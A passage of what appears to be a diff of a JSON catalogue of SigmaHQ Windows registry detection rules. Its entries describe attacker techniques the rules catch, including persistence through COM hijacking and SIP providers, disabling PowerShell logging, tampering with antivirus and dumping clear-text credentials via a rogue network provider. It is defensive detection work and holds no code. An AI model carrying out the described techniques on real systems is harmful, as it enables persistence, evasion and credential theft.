"attack.t1047" - ], - "creation_date": "2020/05/14", - "filename": "registry_set_mal_blue_mockingbird.yml", - "author": "Trent Liffick (@tliffick)", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", - "uuid": "92772523-d9c1-4c93-9547-b0ca500baba3", - "value": "Persistence Via Mpnotify", - "meta": { - "refs": [ - "https://persistence-info.github.io/Data/mpnotify.html", - "https://www.youtube.com/watch?v=ggY3srD9dYs&ab_channel=GrzegorzTworek", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_mpnotify_persistence.yml" - ], - "tags": [ - "attack.persistence" - ], - "creation_date": "2022/07/21", - "filename": "registry_set_mpnotify_persistence.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Might trigger if a legitimate new SIP provider is registered. But this is not a common occurrence in an environment and should be investigated either way" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects changes to the NGenAssemblyUsageLog registry key.\n.NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section).\nBy simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.\n", - "uuid": "28036918-04d3-423d-91c0-55ecf99fb892", - "value": "NET NGenAssemblyUsageLog Registry Key Tamper", - "meta": { - "refs": [ - "https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_net_cli_ngenassemblyusagelog.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "creation_date": "2022/11/18", - "filename": "registry_set_net_cli_ngenassemblyusagelog.yml", - "author": "frack113", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "A General detection for a new application in AppCompat. This indicates an application executing for the first time on an endpoint.", - "uuid": "60936b49-fca0-4f32-993d-7415edcf9a5d", - "value": "New Application in AppCompat", - "meta": { - "refs": [ - "https://github.com/OTRF/detection-hackathon-apt29/issues/1", - "https://threathunterplaybook.com/evals/apt29/detections/1.A.1_DFD6A782-9BDB-4550-AB6B-525E825B095E.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_new_application_appcompat.yml" - ], - "tags": [ - "attack.execution", - "attack.t1204.002" - ], - "creation_date": "2020/05/02", - "filename": "registry_set_new_application_appcompat.yml", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", - "level": "informational", - "falsepositive": [ - "This rule is to explore new applications on an endpoint. False positives depends on the organization.", - "Newly setup system.", - "Legitimate installation of new application." - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", - "uuid": "0442defa-b4a2-41c9-ae2c-ea7042fc4701", - "value": "New Network Provider - Registry", - "meta": { - "refs": [ - "https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/network-provider-settings-removed-in-place-upgrade", - "https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_new_network_provider.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1003" - ], - "creation_date": "2022/08/23", - "filename": "registry_set_new_network_provider.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Other legitimate network providers used and not filtred in this rule" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Enable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel.", - "uuid": "63647769-326d-4dde-a419-b925cc0caf42", - "value": "Enable Microsoft Dynamic Data Exchange", - "meta": { - "refs": [ - "https://msrc.microsoft.com/update-guide/vulnerability/ADV170021", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_enable_dde.yml" - ], - "tags": [ - "attack.execution", - "attack.t1559.002" - ], - "creation_date": "2022/02/26", - "filename": "registry_set_office_enable_dde.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents. (see references)", - "uuid": "a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd", - "value": "Office Security Settings Changed", - "meta": { - "refs": [ - "https://twitter.com/inversecos/status/1494174785621819397", - "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/", - "https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_security.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "creation_date": "2020/05/22", - "filename": "registry_set_office_security.yml", - "author": "Trent Liffick (@tliffick)", - "level": "high", - "falsepositive": [ - "Valid Macros and/or internal documents" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.", - "uuid": "9d15044a-7cfe-4d23-8085-6ebc11df7685", - "value": "Stealthy VSTO Persistence", - "meta": { - "refs": [ - "https://twitter.com/_vivami/status/1347925307643355138", - "https://vanmieghem.io/stealth-outlook-persistence/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_vsto_persistence.yml" - ], - "tags": [ - "attack.t1137.006", - "attack.persistence" - ], - "creation_date": "2021/01/10", - "filename": "registry_set_office_vsto_persistence.yml", - "author": "Bhabesh Raj", - "level": "medium", - "falsepositive": [ - "Legitimate Addin Installation" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects the modification of Outlook Security Setting to allow unprompted execution. Goes with win_outlook_c2_macro_creation.yml and is particularly interesting if both events occur near to each other.", - "uuid": "e3b50fa5-3c3f-444e-937b-0a99d33731cd", - "value": "Outlook C2 Registry Key", - "meta": { - "refs": [ - "https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_outlook_c2_registry_key.yml" - ], - "tags": [ - "attack.persistence", - "attack.command_and_control", - "attack.t1137", - "attack.t1008", - "attack.t1546" - ], - "creation_date": "2021/04/05", - "filename": "registry_set_outlook_c2_registry_key.yml", - "author": "@ScoubiMtl", - "level": "medium", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects the manipulation of persistent URLs which could execute malicious code", - "uuid": "487bb375-12ef-41f6-baae-c6a1572b4dd1", - "value": "Persistent Outlook Landing Today Pages", - "meta": { - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=70", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_outlook_registry_todaypage.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1112" - ], - "creation_date": "2021/06/10", - "filename": "registry_set_outlook_registry_todaypage.yml", - "author": "Tobias Michalski", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects the manipulation of persistent URLs which can be malicious", - "uuid": "ddd171b5-2cc6-4975-9e78-f0eccd08cc76", - "value": "Persistent Outlook Landing Pages", - "meta": { - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=70", - "https://support.microsoft.com/en-us/topic/outlook-home-page-feature-is-missing-in-folder-properties-d207edb7-aa02-46c5-b608-5d9dbed9bd04?ui=en-us&rs=en-us&ad=us", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_outlook_registry_webview.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1112" - ], - "creation_date": "2021/06/09", - "filename": "registry_set_outlook_registry_webview.yml", - "author": "Tobias Michalski", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Change outlook email security settings", - "uuid": "c3cefdf4-6703-4e1c-bad8-bf422fc5015a", - "value": "Change Outlook Security Setting in Registry", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1137/T1137.md", - "https://docs.microsoft.com/en-us/outlook/troubleshoot/security/information-about-email-security-settings", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_outlook_security.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1137" - ], - "creation_date": "2021/12/28", - "filename": "registry_set_outlook_security.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Administrative scripts" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects potential persistence using Appx DebugPath", - "uuid": "df4dc653-1029-47ba-8231-3c44238cc0ae", - "value": "Windows Registry Persistence DebugPath", - "meta": { - "refs": [ - "https://oddvar.moe/2018/09/06/persistence-using-universal-windows-platform-apps-appx/", - "https://github.com/rootm0s/WinPwnage", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_appx_debugger.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546.015" - ], - "creation_date": "2022/07/27", - "filename": "registry_set_persistence_appx_debugger.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects change the the \"AutodialDLL\" key which could be used as a persistence method to load custom DLL via the \"ws2_32\" library", - "uuid": "e6fe26ee-d063-4f5b-b007-39e90aaf50e3", - "value": "Persistence Via AutodialDLL", - "meta": { - "refs": [ - "https://www.hexacorn.com/blog/2015/01/13/beyond-good-ol-run-key-part-24/", - "https://persistence-info.github.io/Data/autodialdll.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_autodial_dll.yml" - ], - "tags": [ - "attack.persistence" - ], - "creation_date": "2022/08/10", - "filename": "registry_set_persistence_autodial_dll.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects potential COM object hijacking where the \"Server\" (In/Out) is pointing to a supsicious or unsuale location", - "uuid": "3d968d17-ffa4-4bc0-bfdc-f139de76ce77", - "value": "COM Hijacking For Persistence With Suspicious Locations", - "meta": { - "refs": [ - "https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/ (idea)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546.015" - ], - "creation_date": "2022/07/28", - "filename": "registry_set_persistence_com_hijacking_susp_locations.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Probable legitimate applications. If you find these please add them to an exclusion list" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects modification to the \"Default\" value of the \"MyComputer\" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)", - "uuid": "8fbe98a8-8f9d-44f8-aa71-8c572e29ef06", - "value": "Persistence Via MyComputer Key and SubKeys", - "meta": { - "refs": [ - "https://www.hexacorn.com/blog/2017/01/18/beyond-good-ol-run-key-part-55/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_mycomputer.yml" - ], - "tags": [ - "attack.persistence" - ], - "creation_date": "2022/08/09", - "filename": "registry_set_persistence_mycomputer.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely but if you experience FPs add specific processes and locations you would like to monitor for" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects potential COM object hijacking leveraging the COM Search Order", - "uuid": "a0ff33d8-79e4-4cef-b4f3-9dc4133ccd12", - "value": "Windows Registry Persistence COM Search Order Hijacking", - "meta": { - "refs": [ - "https://www.cyberbit.com/blog/endpoint-security/com-hijacking-windows-overlooked-security-vulnerability/", - "https://attack.mitre.org/techniques/T1546/015/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_search_order.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546.015" - ], - "creation_date": "2020/04/14", - "filename": "registry_set_persistence_search_order.yml", - "author": "Maxime Thiebaut (@0xThiebaut), oscd.community, C\u00e9dric Hien", - "level": "medium", - "falsepositive": [ - "Some installed utilities (i.e. OneDrive) may serve new COM objects at user-level" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. Which might indicate persistence attempt", - "uuid": "086ae989-9ca6-4fe7-895a-759c5544f247", - "value": "Persistence Via TypedPaths", - "meta": { - "refs": [ - "https://twitter.com/dez_/status/1560101453150257154", - "https://forensafe.com/blogs/typedpaths.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_typed_paths.yml" - ], - "tags": [ - "attack.persistence" - ], - "creation_date": "2022/08/22", - "filename": "registry_set_persistence_typed_paths.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)", - "uuid": "a9b6c011-ab69-4ddb-bc0a-c4f21c80ec47", - "value": "Modify Attachment Manager Settings - Associations", - "meta": { - "refs": [ - "https://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738", - "https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_policies_associations_tamper.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2022/08/01", - "filename": "registry_set_policies_associations_tamper.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects tampering with attachment manager settings policies attachments (See reference for more information)", - "uuid": "ee77a5db-b0f3-4be2-bfd4-b58be1c6b15a", - "value": "Modify Attachment Manager Settings - Attachments", - "meta": { - "refs": [ - "https://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738", - "https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_policies_attachments_tamper.yml" - ], - "tags": [ - "attack.defense_evasion" - ], - "creation_date": "2022/08/01", - "filename": "registry_set_policies_attachments_tamper.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects that a powershell code is written to the registry as a service.", - "uuid": "4a5f5a5e-ac01-474b-9b4e-d61298c9df1d", - "value": "PowerShell as a Service in Registry", - "meta": { - "refs": [ - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_powershell_as_service.yml" - ], - "tags": [ - "attack.execution", - "attack.t1569.002" - ], - "creation_date": "2020/10/06", - "filename": "registry_set_powershell_as_service.yml", - "author": "oscd.community, Natalia Shornikova", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Adds a RUN key that contains a powershell keyword", - "uuid": "8d85cf08-bf97-4260-ba49-986a2a65129c", - "value": "Powershell in Windows Run Keys", - "meta": { - "refs": [ - "https://github.com/frack113/atomic-red-team/blob/a9051c38de8a5320b31c7039efcbd3b56cf2d65a/atomics/T1547.001/T1547.001.md#atomic-test-9---systembc-malware-as-a-service-registry", - "https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_powershell_in_run_keys.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1547.001" - ], - "creation_date": "2022/03/17", - "filename": "registry_set_powershell_in_run_keys.yml", - "author": "frack113, Florian Roth", - "level": "medium", - "falsepositive": [ - "Legitimate admin or third party scripts" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects the modification of the registry of the currently logged in user to disable PowerShell module logging, script block logging or transcription and script execution logging", - "uuid": "fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7", - "value": "PowerShell Logging Disabled", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-32---windows-powershell-logging-disabled", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_powershell_logging_disabled.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.001" - ], - "creation_date": "2022/04/02", - "filename": "registry_set_powershell_logging_disabled.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects when a new custom protocole handler is registered", - "uuid": "fdbf0b9d-0182-4c43-893b-a1eaab92d085", - "value": "Newly Registered Protocol Handler", - "meta": { - "refs": [ - "https://ladydebug.com/blog/2019/06/21/custom-protocol-handler-cph/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_register_custom_protocol_handler.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "creation_date": "2022/05/30", - "filename": "registry_set_register_custom_protocol_handler.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate applications registering a new custom protocol handler" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects non-sysinternals tools setting the \"accepteula\" key which normally is set on sysinternals tool execution", - "uuid": "8023f872-3f1d-4301-a384-801889917ab4", - "value": "Usage of Renamed Sysinternals Tools - RegistrySet", - "meta": { - "refs": [ - "Internal Research", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_renamed_sysinternals_eula_accepted.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1588.002" - ], - "creation_date": "2022/08/24", - "filename": "registry_set_renamed_sysinternals_eula_accepted.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unlikely" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to get the location of the script to execute", - "uuid": "fe20dda1-6f37-4379-bbe0-a98d400cae90", - "value": "Scrobj.dll COM Hijacking", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_scrobj_dll_persistence.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546.015" - ], - "creation_date": "2022/08/20", - "filename": "registry_set_scrobj_dll_persistence.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate use of the dll." - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl", - "uuid": "40b6e656-4e11-4c0c-8772-c1cc6dae34ce", - "value": "ScreenSaver Registry Key Set", - "meta": { - "refs": [ - "https://twitter.com/VakninHai/status/1517027824984547329", - "https://twitter.com/pabraeken/status/998627081360695297", - "https://jstnk9.github.io/jstnk9/research/InstallScreenSaver-SCR-files", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.011" - ], - "creation_date": "2022/05/04", - "filename": "registry_set_scr_file_executed_by_rundll32.yml", - "author": "Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)", - "level": "medium", - "falsepositive": [ - "Legitimate use of screen saver" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects changes to the \"ServiceDLL\" value related to a service in the registry. This is often used as a method of persistence.", - "uuid": "612e47e9-8a59-43a6-b404-f48683f45bd6", - "value": "ServiceDll Hijack", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md#atomic-test-4---tinyturla-backdoor-service-w64time", - "https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_servicedll_hijack.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1543.003" - ], - "creation_date": "2022/02/04", - "filename": "registry_set_servicedll_hijack.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Administrative scripts", - "Installation of a service" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique)", - "uuid": "1c3121ed-041b-4d97-a075-07f54f20fb4a", - "value": "Registry Explorer Policy Modification", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_set_nopolicies_user.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "creation_date": "2022/03/18", - "filename": "registry_set_set_nopolicies_user.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Legitimate admin script" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time\n", - "uuid": "dfb5b4e8-91d0-4291-b40a-e3b0d3942c45", - "value": "Registry Key Creation or Modification for Shim DataBase", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-3---registry-key-creation-andor-modification-events-for-sdb", - "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_shim_databases_persistence.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546.011" - ], - "creation_date": "2021/12/30", - "filename": "registry_set_shim_databases_persistence.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects changes to the Registry in which a monitor program gets registered to monitor the exit of another process", - "uuid": "c81fe886-cac0-4913-a511-2822d72ff505", - "value": "SilentProcessExit Monitor Registration", - "meta": { - "refs": [ - "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/", - "https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_silentprocessexit.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546.012" - ], - "creation_date": "2021/02/26", - "filename": "registry_set_silentprocessexit.yml", - "author": "Florian Roth", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", - "uuid": "5a2b21ee-6aaa-4234-ac9d-59a59edf90a1", - "value": "Persistence Via New SIP Provider", - "meta": { - "refs": [ - "https://persistence-info.github.io/Data/codesigning.html", - "https://github.com/gtworek/PSBits/tree/master/SIP", - "https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_sip_persistence.yml" - ], - "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1553.003" - ], - "creation_date": "2022/07/21", - "filename": "registry_set_sip_persistence.yml", - "author": "Nasreddine Bencherchali", - "level": "medium", - "falsepositive": [ - "Legitimate SIP being registered by the OS or different software." - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects tamper attempts to sophos av functionality via registry key modification", - "uuid": "9f4662ac-17ca-43aa-8f12-5d7b989d0101", - "value": "Tamper With Sophos AV Registry Keys", - "meta": { - "refs": [ - "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_sophos_av_tamaper.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "creation_date": "2022/09/02", - "filename": "registry_set_sophos_av_tamaper.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Some FP may occure when the feature is disabled by the AV itself, you should always investigate if the action was legitimate" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects when an attacker set the registry key \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" to \"0\" in order to hide user account.", - "uuid": "f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd", - "value": "Hide User Account Via Special Accounts Reg Key", - "meta": { - "refs": [ - "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_special_accounts.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1564.002" - ], - "creation_date": "2022/07/12", - "filename": "registry_set_special_accounts.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detect set Notification_Suppress to 1 to disable the windows security center notification", - "uuid": "0c93308a-3f1b-40a9-b649-57ea1a1c1d63", - "value": "Activate Suppression of Windows Security Center Notifications", - "meta": { - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_suppress_defender_notifications.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1112" - ], - "creation_date": "2022/08/19", - "filename": "registry_set_suppress_defender_notifications.yml", - "author": "frack113", - "level": "medium", - "falsepositive": [ - "Unknown" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects changes to the \"Default\" property for keys located in the \\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\ registry. Which might be used as a method of persistence\nThe entries found under App Paths are used primarily for the following purposes.\nFirst, to map an application's executable file name to that file's fully qualified path.\nSecond, to pre-pend information to the PATH environment variable on a per-application, per-process basis.\n", - "uuid": "707e097c-e20f-4f67-8807-1f72ff4500d6", - "value": "Suspicious Values In App Paths Default Property", - "meta": { - "refs": [ - "https://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/", - "https://docs.microsoft.com/en-us/windows/win32/shell/app-registration?redirectedfrom=MSDN", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_app_paths_persistence.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1546.012" - ], - "creation_date": "2022/08/10", - "filename": "registry_set_susp_app_paths_persistence.yml", - "author": "Nasreddine Bencherchali", - "level": "high", - "falsepositive": [ - "Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it)" - ], - "logsource.category": "registry_set", - "logsource.product": "windows" - } - }, - { - "description": "Detects the keyboard preload installation with a suspicious keyboard layout, e.g. Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only", - "uuid": "34aa0252-6039-40ff-951f-939fd6ce47d8", - "value": "Suspicious Keyboard Layout Load", - "meta": { - "refs": [ - "https://renenyffenegger.ch/notes/Windows/registry/tree/HKEY_CURRENT_USER/Keyboard-Layout/Preload/index", - "https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_keyboard_layout_load.yml" - ], - "tags": [ - "attack.resource_development", - "attack.t1588.002" - ], - "creation_date": "2019/10/12", - "filename": "registry_set_susp_keyboard_layout_load.yml", - "author": "Florian Roth", - "level": "medium", - "falsepositive": [ - "Administrators or users that actually use the selected keyboard layouts (heavily depends on the organisation's user base)" - 